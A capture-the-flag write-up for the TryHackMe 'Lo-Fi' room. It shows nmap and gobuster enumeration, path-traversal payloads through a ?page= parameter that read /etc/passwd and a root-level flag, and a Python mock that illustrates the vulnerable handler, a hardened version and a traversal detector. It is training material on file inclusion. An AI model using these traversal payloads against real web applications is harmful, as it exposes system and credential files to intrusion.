Challenges: Lo-Fi (TryHackMe)

This challenge focuses on Local File Inclusion (LFI), a vulnerability where an application includes files based on user input without proper validation. In practice, this allows attackers to read sensitive files or even achieve code execution. The goal here was to explore a web application, identify a vulnerable parameter, and use it to climb the filesystem and retrieve the flag.
Want to hear some lo-fi beats, to relax or study to? We've got you covered!
Access this challenge by deploying both the vulnerable machine by pressing the green "Start Machine" button located within this task, and the TryHackMe AttackBox by pressing the "Start AttackBox" button located at the top-right of the page.
Navigate to the following URL using the AttackBox: http://MACHINE_IP and find the flag in the root of the filesystem.
Note: The web page does load some elements from external sources. However, they do not interfere with the completion of the room.
Answer the questions below
Climb the filesystem to find the flag!
At first, I scanned with nmap and used gobuster to enumerate the directories:
nmap -sV IP_Address
gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/common.txt
Visited the site http://IP_Address, which has a ?page= parameter; this hinted at file inclusion.
Next, I tested this path: /?page=../../../../etc/passwd
And this confirmed LFI.
At first, I tried to check the path http://IP_Address/?page=../../../../root/flag.txt, but there was a hint in the description: “Find the flag in the root of the filesystem.”
http://IP_Address/?page=../../../../flag.txt revealed the flag.
This room teaches that when exploiting LFI, understanding the directory structure and reading task hints is key. Instead of blindly guessing (/root/flag.txt), reading and testing paths systematically saves time. In real-world scenarios, LFI can escalate to Remote Code Execution (RCE) or credential theft if write access or log poisoning is possible, making it a high-severity vulnerability.
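As an added illustration, not code from the room or from this writeup, the Python mock below shows why a ?page= handler like the one above walks out of its page directory, and how a defender would fix it (allowlist plus containment check) and spot the traversal in access logs. The page directory, page names and function names are assumptions made for the demo.

```python
import os
from typing import Optional
from urllib.parse import parse_qs, unquote, urlparse

# Constructed layout for the demo (assumption, not the room's real file structure).
PAGES_DIR = "/var/www/html/pages"
ALLOWED_PAGES = {"home", "lofi", "about"}


def resolve_vulnerable(page: str) -> str:
    """Mimics the vulnerable ?page= handler: user input is joined straight onto the
    pages directory, so '../' sequences (or an absolute path) escape it."""
    return os.path.normpath(os.path.join(PAGES_DIR, page))


def is_contained(base: str, candidate: str) -> bool:
    """True only if candidate is base itself or lies strictly beneath it."""
    base = os.path.normpath(base)
    return candidate == base or candidate.startswith(base + os.sep)


def resolve_hardened(page: str) -> Optional[str]:
    """Defence in depth: an allowlist of page names decides what may be included,
    and a containment check on the normalised path guards against the allowlist
    being relaxed later. Returns None for anything that should be rejected."""
    if page not in ALLOWED_PAGES:
        return None
    candidate = os.path.normpath(os.path.join(PAGES_DIR, page + ".php"))
    if not is_contained(PAGES_DIR, candidate):
        return None
    return candidate


def detect_traversal(request_path: str) -> bool:
    """Log-review helper: flags a request whose page= value contains '..' or an
    absolute path, after undoing one extra layer of URL encoding (parse_qs already
    decodes once, so double-encoded payloads are caught too)."""
    query = parse_qs(urlparse(request_path).query)
    for value in query.get("page", []):
        decoded = unquote(value)
        if ".." in decoded or decoded.startswith("/"):
            return True
    return False
```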
Written by Jebitok